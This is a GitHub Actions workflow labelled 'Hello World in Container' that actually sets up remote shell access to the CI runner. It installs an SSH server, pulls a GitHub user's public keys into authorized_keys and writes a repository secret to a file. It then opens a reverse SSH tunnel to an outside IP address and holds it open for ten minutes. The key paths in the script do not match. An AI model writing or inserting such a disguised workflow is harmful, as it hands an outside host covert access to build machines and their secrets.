name: Hello World in Container

on: [push]

jobs:
  hello-world:
    environment: standard
    runs-on: ubuntu-latest
  

    steps:

    - name: Run Hello World in Docker#
      
      run: |
        sudo apt update >> /dev/null
        sudo apt install -y curl openssh-server jq >> /dev/null
        # sudo mkdir /var/run/sshd && sudo chmod 0755 /var/run/sshd
        id
        ssh-keygen -t rsa
        echo $GITHUB_ACTOR
        curl -s https://api.github.com/users/bechampion/keys | jq '.[].key' > ~/.ssh/authorized_keys
        echo "${{ secrets.PEPEKEY }}" > ~/key
        sudo /usr/sbin/sshd -p 9090 -o PubkeyAuthentication=yes
        chmod 0600 ~/key
        ssh -R 9090:localhost:9090 -o StrictHostKeyChecking=no 95.145.6.1 -p 2222 -i /tmp/mykey -l pepe "sleep 600"
